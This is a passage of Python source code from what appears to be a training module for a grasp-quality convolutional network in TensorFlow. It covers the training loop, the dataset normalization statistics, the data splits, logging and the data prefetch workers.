# run optimization
step_start = time.time()
if self._angular_bins > 0:
images, poses, labels, masks = self.prefetch_q.get()
_, l, ur_l, lr, predictions, raw_net_output = self.sess.run([apply_grad_op, loss, unregularized_loss, learning_rate, train_predictions, self.train_net_output], feed_dict={drop_rate_in: self.drop_rate, self.input_im_node: images, self.input_pose_node: poses, self.train_labels_node: labels, self.train_pred_mask_node: masks}, options=GeneralConstants.timeout_option)
else:
images, poses, labels = self.prefetch_q.get()
_, l, ur_l, lr, predictions, raw_net_output = self.sess.run([apply_grad_op, loss, unregularized_loss, learning_rate, train_predictions, self.train_net_output], feed_dict={drop_rate_in: self.drop_rate, self.input_im_node: images, self.input_pose_node: poses, self.train_labels_node: labels}, options=GeneralConstants.timeout_option)
step_stop = time.time()
self.logger.info('Step took %.3f sec.' %(step_stop-step_start))
if self.training_mode == TrainingMode.REGRESSION:
self.logger.info('Max ' + str(np.max(predictions)))
self.logger.info('Min ' + str(np.min(predictions)))
elif self.cfg['loss'] != 'weighted_cross_entropy':
if self._angular_bins == 0:
ex = np.exp(raw_net_output - np.tile(np.max(raw_net_output, axis=1)[:,np.newaxis], [1,2]))
softmax = ex / np.tile(np.sum(ex, axis=1)[:,np.newaxis], [1,2])
self.logger.info('Max ' + str(np.max(softmax[:,1])))
self.logger.info('Min ' + str(np.min(softmax[:,1])))
self.logger.info('Pred nonzero ' + str(np.sum(softmax[:,1] > 0.5)))
self.logger.info('True nonzero ' + str(np.sum(labels)))
else:
sigmoid = 1.0 / (1.0 + np.exp(-raw_net_output))
self.logger.info('Max ' + str(np.max(sigmoid)))
self.logger.info('Min ' + str(np.min(sigmoid)))
self.logger.info('Pred nonzero ' + str(np.sum(sigmoid > 0.5)))
self.logger.info('True nonzero ' + str(np.sum(labels > 0.5)))
if np.isnan(l) or np.any(np.isnan(poses)):
self.logger.error('Encountered NaN in loss or training poses!')
raise Exception
# log output
if step % self.log_frequency == 0:
elapsed_time = time.time() - start_time
start_time = time.time()
self.logger.info('Step %d (epoch %.2f), %.1f s' %
(step, float(step) * self.train_batch_size / self.num_train,
1000 * elapsed_time / self.eval_frequency))
self.logger.info('Minibatch loss: %.3f, learning rate: %.6f' % (l, lr))
if self.progress_dict is not None:
self.progress_dict['epoch'] = round(float(step) * self.train_batch_size / self.num_train, 2)
train_error = l
if self.training_mode == TrainingMode.CLASSIFICATION:
if self._angular_bins > 0:
predictions = predictions[masks.astype(bool)].reshape((-1, 2))
classification_result = BinaryClassificationResult(predictions[:,1], labels)
train_error = classification_result.error_rate
self.logger.info('Minibatch error: %.3f' %(train_error))
self.summary_writer.add_summary(self.sess.run(self.merged_log_summaries, feed_dict={self.minibatch_error_placeholder: train_error, self.minibatch_loss_placeholder: l, self.learning_rate_placeholder: lr}), step)
sys.stdout.flush()
# update the TrainStatsLogger
self.train_stats_logger.update(train_eval_iter=step, train_loss=l, train_error=train_error, total_train_error=None, val_eval_iter=None, val_error=None, learning_rate=lr)
# evaluate model
if step % self.eval_frequency == 0 and step > 0:
if self.cfg['eval_total_train_error']:
train_result = self._error_rate_in_batches(validation_set=False)
self.logger.info('Training error: %.3f' %(train_result.error_rate))
# update the TrainStatsLogger and save
self.train_stats_logger.update(train_eval_iter=None, train_loss=None, train_error=None, total_train_error=train_result.error_rate, total_train_loss=train_result.cross_entropy_loss, val_eval_iter=None, val_error=None, learning_rate=None)
self.train_stats_logger.log()
if self.train_pct < 1.0:
val_result = self._error_rate_in_batches()
self.summary_writer.add_summary(self.sess.run(self.merged_eval_summaries, feed_dict={self.val_error_placeholder: val_result.error_rate}), step)
self.logger.info('Validation error: %.3f' %(val_result.error_rate))
self.logger.info('Validation loss: %.3f' %(val_result.cross_entropy_loss))
sys.stdout.flush()
# update the TrainStatsLogger
if self.train_pct < 1.0:
self.train_stats_logger.update(train_eval_iter=None, train_loss=None, train_error=None, total_train_error=None, val_eval_iter=step, val_loss=val_result.cross_entropy_loss, val_error=val_result.error_rate, learning_rate=None)
else:
self.train_stats_logger.update(train_eval_iter=None, train_loss=None, train_error=None, total_train_error=None, val_eval_iter=step, learning_rate=None)
# save everything!
self.train_stats_logger.log()
# save the model
if step % self.save_frequency == 0 and step > 0:
self.saver.save(self.sess, os.path.join(self.model_dir, 'model_%05d.ckpt' %(step)))
self.saver.save(self.sess, os.path.join(self.model_dir, 'model.ckpt'))
# launch tensorboard only after the first iteration
if not self.tensorboard_has_launched:
self.tensorboard_has_launched = True
self._launch_tensorboard()
# get final errors and flush the stdout pipeline
final_val_result = self._error_rate_in_batches()
self.logger.info('Final validation error: %.3f%%' %final_val_result.error_rate)
self.logger.info('Final validation loss: %.3f' %final_val_result.cross_entropy_loss)
if self.cfg['eval_total_train_error']:
final_train_result = self._error_rate_in_batches(validation_set=False)
self.logger.info('Final training error: {}'.format(final_train_result.error_rate))
self.logger.info('Final training loss: {}'.format(final_train_result.cross_entropy_loss))
sys.stdout.flush()
# update the TrainStatsLogger
self.train_stats_logger.update(train_eval_iter=None, train_loss=None, train_error=None, total_train_error=None, val_eval_iter=step, val_loss=final_val_result.cross_entropy_loss, val_error=final_val_result.error_rate, learning_rate=None)
# log & save everything!
self.train_stats_logger.log()
self.saver.save(self.sess, os.path.join(self.model_dir, 'model.ckpt'))
except Exception as e:
self._cleanup()
raise
self._cleanup()
def _compute_data_metrics(self):
""" Calculate image mean, image std, pose mean, pose std, normalization params """
# subsample tensors (for faster runtime)
random_file_indices = np.random.choice(self.num_tensors,
size=self.num_random_files,
replace=False)
if self.gqcnn.input_depth_mode == InputDepthMode.POSE_STREAM:
# compute image stats
im_mean_filename = os.path.join(self.model_dir, 'im_mean.npy')
im_std_filename = os.path.join(self.model_dir, 'im_std.npy')
if os.path.exists(im_mean_filename) and os.path.exists(im_std_filename):
self.im_mean = np.load(im_mean_filename)
self.im_std = np.load(im_std_filename)
else:
self.im_mean = 0
self.im_std = 0
# compute mean
self.logger.info('Computing image mean')
num_summed = 0
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to image mean estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_mean += np.sum(im_data[train_indices, ...])
num_summed += self.train_index_map[i].shape[0] * im_data.shape[1] * im_data.shape[2]
self.im_mean = self.im_mean / num_summed
# compute std
self.logger.info('Computing image std')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to image std estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_std += np.sum((im_data[train_indices, ...] - self.im_mean)**2)
self.im_std = np.sqrt(self.im_std / num_summed)
# save
np.save(im_mean_filename, self.im_mean)
np.save(im_std_filename, self.im_std)
# update gqcnn
self.gqcnn.set_im_mean(self.im_mean)
self.gqcnn.set_im_std(self.im_std)
# compute pose stats
pose_mean_filename = os.path.join(self.model_dir, 'pose_mean.npy')
pose_std_filename = os.path.join(self.model_dir, 'pose_std.npy')
if os.path.exists(pose_mean_filename) and os.path.exists(pose_std_filename):
self.pose_mean = np.load(pose_mean_filename)
self.pose_std = np.load(pose_std_filename)
else:
self.pose_mean = np.zeros(self.raw_pose_shape)
self.pose_std = np.zeros(self.raw_pose_shape)
# compute mean
num_summed = 0
self.logger.info('Computing pose mean')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to pose mean estimate' %(k+1, random_file_indices.shape[0]))
pose_data = self.dataset.tensor(self.pose_field_name, i).arr
train_indices = self.train_index_map[i]
if self.gripper_mode == GripperMode.SUCTION:
rand_indices = np.random.choice(pose_data.shape[0],
size=pose_data.shape[0]/2,
replace=False)
pose_data[rand_indices, 4] = -pose_data[rand_indices, 4]
elif self.gripper_mode == GripperMode.LEGACY_SUCTION:
rand_indices = np.random.choice(pose_data.shape[0],
size=pose_data.shape[0]/2,
replace=False)
pose_data[rand_indices, 3] = -pose_data[rand_indices, 3]
if train_indices.shape[0] > 0:
pose_data = pose_data[train_indices,:]
pose_data = pose_data[np.isfinite(pose_data[:,3]),:]
self.pose_mean += np.sum(pose_data, axis=0)
num_summed += pose_data.shape[0]
self.pose_mean = self.pose_mean / num_summed
# compute std
self.logger.info('Computing pose std')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to pose std estimate' %(k+1, random_file_indices.shape[0]))
pose_data = self.dataset.tensor(self.pose_field_name, i).arr
train_indices = self.train_index_map[i]
if self.gripper_mode == GripperMode.SUCTION:
rand_indices = np.random.choice(pose_data.shape[0],
size=pose_data.shape[0]/2,
replace=False)
pose_data[rand_indices, 4] = -pose_data[rand_indices, 4]
elif self.gripper_mode == GripperMode.LEGACY_SUCTION:
rand_indices = np.random.choice(pose_data.shape[0],
size=pose_data.shape[0]/2,
replace=False)
pose_data[rand_indices, 3] = -pose_data[rand_indices, 3]
if train_indices.shape[0] > 0:
pose_data = pose_data[train_indices,:]
pose_data = pose_data[np.isfinite(pose_data[:,3]),:]
self.pose_std += np.sum((pose_data - self.pose_mean)**2, axis=0)
self.pose_std = np.sqrt(self.pose_std / num_summed)
self.pose_std[self.pose_std==0] = 1.0
# save
self.pose_mean = read_pose_data(self.pose_mean, self.gripper_mode)
self.pose_std = read_pose_data(self.pose_std, self.gripper_mode)
np.save(pose_mean_filename, self.pose_mean)
np.save(pose_std_filename, self.pose_std)
# update gqcnn
self.gqcnn.set_pose_mean(self.pose_mean)
self.gqcnn.set_pose_std(self.pose_std)
# check for invalid values
if np.any(np.isnan(self.pose_mean)) or np.any(np.isnan(self.pose_std)):
self.logger.error('Pose mean or pose std is NaN! Check the input dataset')
exit(0)
elif self.gqcnn.input_depth_mode == InputDepthMode.SUB:
# compute (image - depth) stats
im_depth_sub_mean_filename = os.path.join(self.model_dir, 'im_depth_sub_mean.npy')
im_depth_sub_std_filename = os.path.join(self.model_dir, 'im_depth_sub_std.npy')
if os.path.exists(im_depth_sub_mean_filename) and os.path.exists(im_depth_sub_std_filename):
self.im_depth_sub_mean = np.load(im_depth_sub_mean_filename)
self.im_depth_sub_std = np.load(im_depth_sub_std_filename)
else:
self.im_depth_sub_mean = 0
self.im_depth_sub_std = 0
# compute mean
self.logger.info('Computing (image - depth) mean')
num_summed = 0
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to (image - depth) mean estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
depth_data = read_pose_data(self.dataset.tensor(self.pose_field_name, i).arr, self.gripper_mode)
sub_data = im_data - np.tile(np.reshape(depth_data, (-1, 1, 1, 1)), (1, im_data.shape[1], im_data.shape[2], 1))
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_depth_sub_mean += np.sum(sub_data[train_indices, ...])
num_summed += self.train_index_map[i].shape[0] * im_data.shape[1] * im_data.shape[2]
self.im_depth_sub_mean = self.im_depth_sub_mean / num_summed
# compute std
self.logger.info('Computing (image - depth) std')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to (image - depth) std estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
depth_data = read_pose_data(self.dataset.tensor(self.pose_field_name, i).arr, self.gripper_mode)
sub_data = im_data - np.tile(np.reshape(depth_data, (-1, 1, 1, 1)), (1, im_data.shape[1], im_data.shape[2], 1))
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_depth_sub_std += np.sum((sub_data[train_indices, ...] - self.im_depth_sub_mean)**2)
self.im_depth_sub_std = np.sqrt(self.im_depth_sub_std / num_summed)
# save
np.save(im_depth_sub_mean_filename, self.im_depth_sub_mean)
np.save(im_depth_sub_std_filename, self.im_depth_sub_std)
# update gqcnn
self.gqcnn.set_im_depth_sub_mean(self.im_depth_sub_mean)
self.gqcnn.set_im_depth_sub_std(self.im_depth_sub_std)
elif self.gqcnn.input_depth_mode == InputDepthMode.IM_ONLY:
# compute image stats
im_mean_filename = os.path.join(self.model_dir, 'im_mean.npy')
im_std_filename = os.path.join(self.model_dir, 'im_std.npy')
if os.path.exists(im_mean_filename) and os.path.exists(im_std_filename):
self.im_mean = np.load(im_mean_filename)
self.im_std = np.load(im_std_filename)
else:
self.im_mean = 0
self.im_std = 0
# compute mean
self.logger.info('Computing image mean')
num_summed = 0
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to image mean estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_mean += np.sum(im_data[train_indices, ...])
num_summed += self.train_index_map[i].shape[0] * im_data.shape[1] * im_data.shape[2]
self.im_mean = self.im_mean / num_summed
# compute std
self.logger.info('Computing image std')
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to image std estimate' %(k+1, random_file_indices.shape[0]))
im_data = self.dataset.tensor(self.im_field_name, i).arr
train_indices = self.train_index_map[i]
if train_indices.shape[0] > 0:
self.im_std += np.sum((im_data[train_indices, ...] - self.im_mean)**2)
self.im_std = np.sqrt(self.im_std / num_summed)
# save
np.save(im_mean_filename, self.im_mean)
np.save(im_std_filename, self.im_std)
# update gqcnn
self.gqcnn.set_im_mean(self.im_mean)
self.gqcnn.set_im_std(self.im_std)
# compute normalization parameters of the network
pct_pos_train_filename = os.path.join(self.model_dir, 'pct_pos_train.npy')
pct_pos_val_filename = os.path.join(self.model_dir, 'pct_pos_val.npy')
if os.path.exists(pct_pos_train_filename) and os.path.exists(pct_pos_val_filename):
pct_pos_train = np.load(pct_pos_train_filename)
pct_pos_val = np.load(pct_pos_val_filename)
else:
self.logger.info('Computing grasp quality metric stats')
all_train_metrics = None
all_val_metrics = None
# read metrics
for k, i in enumerate(random_file_indices):
if k % self.preproc_log_frequency == 0:
self.logger.info('Adding file %d of %d to metric stat estimates' %(k+1, random_file_indices.shape[0]))
metric_data = self.dataset.tensor(self.label_field_name, i).arr
train_indices = self.train_index_map[i]
val_indices = self.val_index_map[i]
if train_indices.shape[0] > 0:
train_metric_data = metric_data[train_indices]
if all_train_metrics is None:
all_train_metrics = train_metric_data
else:
all_train_metrics = np.r_[all_train_metrics, train_metric_data]
if val_indices.shape[0] > 0:
val_metric_data = metric_data[val_indices]
if all_val_metrics is None:
all_val_metrics = val_metric_data
else:
all_val_metrics = np.r_[all_val_metrics, val_metric_data]
# compute train stats
self.min_metric = np.min(all_train_metrics)
self.max_metric = np.max(all_train_metrics)
self.mean_metric = np.mean(all_train_metrics)
self.median_metric = np.median(all_train_metrics)
# save metrics
pct_pos_train = float(np.sum(all_train_metrics > self.metric_thresh)) / all_train_metrics.shape[0]
np.save(pct_pos_train_filename, np.array(pct_pos_train))
if self.train_pct < 1.0:
pct_pos_val = float(np.sum(all_val_metrics > self.metric_thresh)) / all_val_metrics.shape[0]
np.save(pct_pos_val_filename, np.array(pct_pos_val))
self.logger.info('Percent positive in train: ' + str(pct_pos_train))
if self.train_pct < 1.0:
self.logger.info('Percent positive in val: ' + str(pct_pos_val))
if self._angular_bins > 0:
self.logger.info('Calculating angular bin statistics...')
bin_counts = np.zeros((self._angular_bins,))
for m in range(self.num_tensors):
pose_arr = self.dataset.tensor(self.pose_field_name, m).arr
angles = pose_arr[:, 3]
neg_ind = np.where(angles < 0)
angles = np.abs(angles) % self._max_angle
angles[neg_ind] *= -1
g_90 = np.where(angles > (self._max_angle / 2))
l_neg_90 = np.where(angles < (-1 * (self._max_angle / 2)))
angles[g_90] -= self._max_angle
angles[l_neg_90] += self._max_angle
angles *= -1 # hack to fix reverse angle convention
angles += (self._max_angle / 2)
for i in range(angles.shape[0]):
bin_counts[int(angles[i] // self._bin_width)] += 1
self.logger.info('Bin counts: {}'.format(bin_counts))
def _compute_split_indices(self):
""" Compute train and validation indices for each tensor to speed data accesses """
# read indices
train_indices, val_indices, _ = self.dataset.split(self.split_name)
# loop through tensors, assigning indices to each file
self.train_index_map = {}
for i in range(self.dataset.num_tensors):
self.train_index_map[i] = []
for i in train_indices:
tensor_index = self.dataset.tensor_index(i)
datapoint_indices = self.dataset.datapoint_indices_for_tensor(tensor_index)
lowest = np.min(datapoint_indices)
self.train_index_map[tensor_index].append(i - lowest)
for i, indices in self.train_index_map.items():
self.train_index_map[i] = np.array(indices)
self.val_index_map = {}
for i in range(self.dataset.num_tensors):
self.val_index_map[i] = []
for i in val_indices:
tensor_index = self.dataset.tensor_index(i)
if tensor_index not in self.val_index_map.keys():
self.val_index_map[tensor_index] = []
datapoint_indices = self.dataset.datapoint_indices_for_tensor(tensor_index)
lowest = np.min(datapoint_indices)
self.val_index_map[tensor_index].append(i - lowest)
for i, indices in self.val_index_map.items():
self.val_index_map[i] = np.array(indices)
def _setup_output_dirs(self):
"""Setup output directories."""
self.logger.info('Saving model to: {}'.format(self.model_dir))
# create the summary dir
self.summary_dir = os.path.join(self.model_dir, 'tensorboard_summaries')
if not os.path.exists(self.summary_dir):
os.mkdir(self.summary_dir)
else:
# if the summary directory already exists, clean it out by deleting all files in it
# we don't want tensorboard to get confused with old logs while debugging with the same directory
old_files = os.listdir(self.summary_dir)
for f in old_files:
os.remove(os.path.join(self.summary_dir, f))
# setup filter directory
self.filter_dir = os.path.join(self.model_dir, 'filters')
if not os.path.exists(self.filter_dir):
os.mkdir(self.filter_dir)
def _save_configs(self):
"""Save training configuration."""
# update config for fine-tuning
if self.finetuning:
self.cfg['base_model_dir'] = self.base_model_dir
# save config
out_config_filename = os.path.join(self.model_dir, 'config.json')
tempOrderedDict = collections.OrderedDict()
for key in self.cfg.keys():
tempOrderedDict[key] = self.cfg[key]
with open(out_config_filename, 'w') as outfile:
json.dump(tempOrderedDict,
outfile,
indent=GeneralConstants.JSON_INDENT)
# save training script
this_filename = sys.argv[0]
out_train_filename = os.path.join(self.model_dir, 'training_script.py')
shutil.copyfile(this_filename, out_train_filename)
# save architecture
out_architecture_filename = os.path.join(self.model_dir, 'architecture.json')
json.dump(self.cfg['gqcnn']['architecture'],
open(out_architecture_filename, 'w'),
indent=GeneralConstants.JSON_INDENT)
def _read_training_params(self):
""" Read training parameters from configuration file """
# splits
self.train_pct = self.cfg['train_pct']
self.total_pct = self.cfg['total_pct']
# training sizes
self.train_batch_size = self.cfg['train_batch_size']
self.val_batch_size = self.cfg['val_batch_size']
self.max_files_eval = None
if 'max_files_eval' in self.cfg.keys():
self.max_files_eval = self.cfg['max_files_eval']
# logging
self.num_epochs = self.cfg['num_epochs']
self.eval_frequency = self.cfg['eval_frequency']
self.save_frequency = self.cfg['save_frequency']
self.log_frequency = self.cfg['log_frequency']
# optimization
self.train_l2_regularizer = self.cfg['train_l2_regularizer']
self.base_lr = self.cfg['base_lr']
self.decay_step_multiplier = self.cfg['decay_step_multiplier']
self.decay_rate = self.cfg['decay_rate']
self.momentum_rate = self.cfg['momentum_rate']
self.max_training_examples_per_load = self.cfg['max_training_examples_per_load']
self.drop_rate = self.cfg['drop_rate']
self.max_global_grad_norm = self.cfg['max_global_grad_norm']
self.optimize_base_layers = False
if 'optimize_base_layers' in self.cfg.keys():
self.optimize_base_layers = self.cfg['optimize_base_layers']
# metrics
self.target_metric_name = self.cfg['target_metric_name']
self.metric_thresh = self.cfg['metric_thresh']
self.training_mode = self.cfg['training_mode']
if self.training_mode != TrainingMode.CLASSIFICATION:
raise ValueError('Training mode %s not currently supported!' %(self.training_mode))
# tensorboad
self._tensorboard_port = self.cfg['tensorboard_port']
# preproc
self.preproc_log_frequency = self.cfg['preproc_log_frequency']
self.num_random_files = self.cfg['num_random_files']
self.max_prefetch_q_size = GeneralConstants.MAX_PREFETCH_Q_SIZE
if 'max_prefetch_q_size' in self.cfg.keys():
self.max_prefetch_q_size = self.cfg['max_prefetch_q_size']
self.num_prefetch_q_workers = GeneralConstants.NUM_PREFETCH_Q_WORKERS
if 'num_prefetch_q_workers' in self.cfg.keys():
self.num_prefetch_q_workers = self.cfg['num_prefetch_q_workers']
# re-weighting positives / negatives
self.pos_weight = 0.0
if 'pos_weight' in self.cfg.keys():
self.pos_weight = self.cfg['pos_weight']
self.pos_accept_prob = 1.0
self.neg_accept_prob = 1.0
if self.pos_weight > 1:
self.neg_accept_prob = 1.0 / self.pos_weight
else:
self.pos_accept_prob = self.pos_weight
if self.train_pct < 0 or self.train_pct > 1:
raise ValueError('Train percentage must be in range [0,1]')
if self.total_pct < 0 or self.total_pct > 1:
raise ValueError('Total percentage must be in range [0,1]')
# normalization
self._norm_inputs = True
if self.gqcnn.input_depth_mode == InputDepthMode.SUB:
self._norm_inputs = False
# angular training
self._angular_bins = self.gqcnn.angular_bins
self._max_angle = self.gqcnn.max_angle
# during angular training, make sure symmetrization in denoising is turned off and also set the angular bin width
if self._angular_bins > 0:
assert not self.cfg['symmetrize'], 'Symmetrization denoising must be turned off during angular training'
self._bin_width = self._max_angle / self._angular_bins
# debugging
self._debug = self.cfg['debug']
self._seed = self.cfg['seed']
if self._debug:
if self.num_prefetch_q_workers > 1:
self.logger.warning('Deterministic execution is not possible with '
'more than one prefetch queue worker even in debug mode.')
self.num_random_files = self.cfg['debug_num_files'] # this reduces initialization time
np.random.seed(self._seed)
random.seed(self._seed)
def _setup_denoising_and_synthetic(self):
""" Setup denoising and synthetic data parameters """
# multiplicative denoising
if self.cfg['multiplicative_denoising']:
self.gamma_shape = self.cfg['gamma_shape']
self.gamma_scale = 1.0 / self.gamma_shape
# gaussian process noise
if self.cfg['gaussian_process_denoising']:
self.gp_rescale_factor = self.cfg['gaussian_process_scaling_factor']
self.gp_sample_height = int(self.im_height / self.gp_rescale_factor)
self.gp_sample_width = int(self.im_width / self.gp_rescale_factor)
self.gp_num_pix = self.gp_sample_height * self.gp_sample_width
self.gp_sigma = self.cfg['gaussian_process_sigma']
def _open_dataset(self):
""" Open the dataset """
# read in filenames of training data(poses, images, labels)
self.dataset = TensorDataset.open(self.dataset_dir)
self.num_datapoints = self.dataset.num_datapoints
self.num_tensors = self.dataset.num_tensors
self.datapoints_per_file = self.dataset.datapoints_per_file
self.num_random_files = min(self.num_tensors, self.num_random_files)
# read split
if not self.dataset.has_split(self.split_name):
self.logger.info('Training split: {} not found in dataset. Creating new split...'.format(self.split_name))
self.dataset.make_split(self.split_name, train_pct=self.train_pct)
else:
self.logger.info('Training split: {} found in dataset.'.format(self.split_name))
self._compute_split_indices()
def _compute_data_params(self):
""" Compute parameters of the dataset """
# image params
self.im_field_name = self.cfg['image_field_name']
self.im_height = self.dataset.config['fields'][self.im_field_name]['height']
self.im_width = self.dataset.config['fields'][self.im_field_name]['width']
self.im_channels = self.dataset.config['fields'][self.im_field_name]['channels']
self.im_center = np.array([float(self.im_height-1)/2, float(self.im_width-1)/2])
# poses
self.pose_field_name = self.cfg['pose_field_name']
self.gripper_mode = self.gqcnn.gripper_mode
self.pose_dim = pose_dim(self.gripper_mode)
self.raw_pose_shape = self.dataset.config['fields'][self.pose_field_name]['height']
# outputs
self.label_field_name = self.target_metric_name
self.num_categories = 2
# compute the number of train and val examples
self.num_train = 0
self.num_val = 0
for train_indices in self.train_index_map.values():
self.num_train += train_indices.shape[0]
for val_indices in self.train_index_map.values():
self.num_val += val_indices.shape[0]
# set params based on the number of training examples (convert epochs to steps)
self.eval_frequency = int(np.ceil(self.eval_frequency * (float(self.num_train) / self.train_batch_size)))
self.save_frequency = int(np.ceil(self.save_frequency * (float(self.num_train) / self.train_batch_size)))
self.decay_step = self.decay_step_multiplier * self.num_train
def _setup_tensorflow(self):
"""Setup Tensorflow placeholders, session, and queue"""
# set up training label and numpy datatypes
if self.training_mode == TrainingMode.REGRESSION:
train_label_dtype = tf.float32
self.numpy_dtype = np.float32
elif self.training_mode == TrainingMode.CLASSIFICATION:
train_label_dtype = tf.int64
self.numpy_dtype = np.int64
if self.cfg['loss'] == 'weighted_cross_entropy':
train_label_dtype = tf.float32
self.numpy_dtype = np.float32
else:
raise ValueError('Training mode %s not supported' %(self.training_mode))
# set up placeholders
self.train_labels_node = tf.placeholder(train_label_dtype, (self.train_batch_size,))
self.input_im_node = tf.placeholder(tf.float32, (self.train_batch_size, self.im_height, self.im_width, self.im_channels))
self.input_pose_node = tf.placeholder(tf.float32, (self.train_batch_size, self.pose_dim))
if self._angular_bins > 0:
self.train_pred_mask_node = tf.placeholder(tf.int32, (self.train_batch_size, self._angular_bins * 2))
# create data prefetch queue
self.prefetch_q = mp.Queue(self.max_prefetch_q_size)
# get weights
self.weights = self.gqcnn.weights
# open a tf session for the gqcnn object and store it also as the optimizer session
self.sess = self.gqcnn.open_session()
# setup data prefetch queue worker termination event
self.term_event = mp.Event()
self.term_event.clear()
def _setup_summaries(self):
""" Sets up placeholders for summary values and creates summary writer """
# we create placeholders for our python values because summary_scalar expects
# a placeholder, not simply a python value
self.val_error_placeholder = tf.placeholder(tf.float32, [])
self.minibatch_error_placeholder = tf.placeholder(tf.float32, [])
self.minibatch_loss_placeholder = tf.placeholder(tf.float32, [])
self.learning_rate_placeholder = tf.placeholder(tf.float32, [])
# we create summary scalars with tags that allow us to group them together so we can write different batches
# of summaries at different intervals
tf.summary.scalar('val_error', self.val_error_placeholder, collections=["eval_frequency"])
tf.summary.scalar('minibatch_error', self.minibatch_error_placeholder, collections=["log_frequency"])
tf.summary.scalar('minibatch_loss', self.minibatch_loss_placeholder, collections=["log_frequency"])
tf.summary.scalar('learning_rate', self.learning_rate_placeholder, collections=["log_frequency"])
self.merged_eval_summaries = tf.summary.merge_all("eval_frequency")
self.merged_log_summaries = tf.summary.merge_all("log_frequency")
# create a tf summary writer with the specified summary directory
self.summary_writer = tf.summary.FileWriter(self.summary_dir)
# initialize the variables again now that we have added some new ones
with self.sess.as_default():
tf.global_variables_initializer().run()
def _cleanup(self):
self.logger.info('Cleaning and preparing to exit optimization...')
# set termination even for prefetch queue workers
self.logger.info('Terminating prefetch queue workers...')
self.term_event.set()
# flush prefetch queue
#NOTE: this prevents a deadlock with the worker process queue buffers
self._flush_prefetch_queue()
# join prefetch queue worker processes
for p in self.prefetch_q_workers:
p.join()
# close tensorboard if started
if self.tensorboard_has_launched:
self._close_tensorboard()
# close tensorflow session
self.gqcnn.close_session()
# cleanup
for layer_weights in self.weights.values():
del layer_weights
del self.saver
del self.sess
def _flush_prefetch_queue(self):
"""Flush prefetch queue."""
self.logger.info('Flushing prefetch queue...')
for i in range(self.prefetch_q.qsize()):
self.prefetch_q.get()
def _setup(self):
"""Setup for training."""
# initialize data prefetch queue thread exit booleans
self.queue_thread_exited = False
self.forceful_exit = False
# setup output directories
self._setup_output_dirs()
# save training configuration
self._save_configs()
# read training parameters from config file
self._read_training_params()
# setup image and pose data files
self._open_dataset()
# compute data parameters
self._compute_data_params()
# setup denoising and synthetic data parameters
self._setup_denoising_and_synthetic()
# compute means, std's, and normalization metrics
self._compute_data_metrics()
# setup tensorflow session/placeholders/queue
self._setup_tensorflow()
# setup summaries for visualizing metrics in tensorboard
self._setup_summaries()
def _load_and_enqueue(self, seed):
""" Loads and enqueues a batch of images for training """
signal.signal(signal.SIGINT, signal.SIG_IGN) # when the parent process receives a SIGINT, it will itself handle cleaning up child processes
# set the random seed explicitly to prevent all workers from possible inheriting
# the same seed on process initialization
np.random.seed(seed)
random.seed(seed)
# open dataset
dataset = TensorDataset.open(self.dataset_dir)
while not self.term_event.is_set():
# loop through data
num_queued = 0
start_i = 0
end_i = 0
file_num = 0
queue_start = time.time()
# init buffers
train_images = np.zeros(
[self.train_batch_size, self.im_height, self.im_width, self.im_channels]).astype(np.float32)
train_poses = np.zeros([self.train_batch_size, self.pose_dim]).astype(np.float32)
train_labels = np.zeros(self.train_batch_size).astype(self.numpy_dtype)
if self._angular_bins > 0:
train_pred_mask = np.zeros((self.train_batch_size, self._angular_bins*2), dtype=bool)
while start_i < self.train_batch_size:
# compute num remaining
num_remaining = self.train_batch_size - num_queued
# gen tensor index uniformly at random
file_num = np.random.choice(self.num_tensors, size=1)[0]
read_start = time.time()
train_images_tensor = dataset.tensor(self.im_field_name, file_num)
train_poses_tensor = dataset.tensor(self.pose_field_name, file_num)
train_labels_tensor = dataset.tensor(self.label_field_name, file_num)
read_stop = time.time()
self.logger.debug('Reading data took %.3f sec' %(read_stop - read_start))
self.logger.debug('File num: %d' %(file_num))
# get batch indices uniformly at random
train_ind = self.train_index_map[file_num]
np.random.shuffle(train_ind)
if self.gripper_mode == GripperMode.LEGACY_SUCTION:
tp_tmp = read_pose_data(train_poses_tensor.data, self.gripper_mode)
train_ind = train_ind[np.isfinite(tp_tmp[train_ind,1])]
# filter positives and negatives
if self.training_mode == TrainingMode.CLASSIFICATION and self.pos_weight != 0.0:
labels = 1 * (train_labels_tensor.arr > self.metric_thresh)
np.random.shuffle(train_ind)
filtered_ind = []
for index in train_ind:
if labels[index] == 0 and np.random.rand() < self.neg_accept_prob:
filtered_ind.append(index)
elif labels[index] == 1 and np.random.rand() < self.pos_accept_prob:
filtered_ind.append(index)
train_ind = np.array(filtered_ind)
# samples train indices
upper = min(num_remaining, train_ind.shape[0], self.max_training_examples_per_load)
ind = train_ind[:upper]
num_loaded = ind.shape[0]
if num_loaded == 0:
self.logger.warning('Queueing zero examples!!!!')
continue
# subsample data
train_images_arr = train_images_tensor.arr[ind, ...]
train_poses_arr = train_poses_tensor.arr[ind, ...]
angles = train_poses_arr[:, 3]
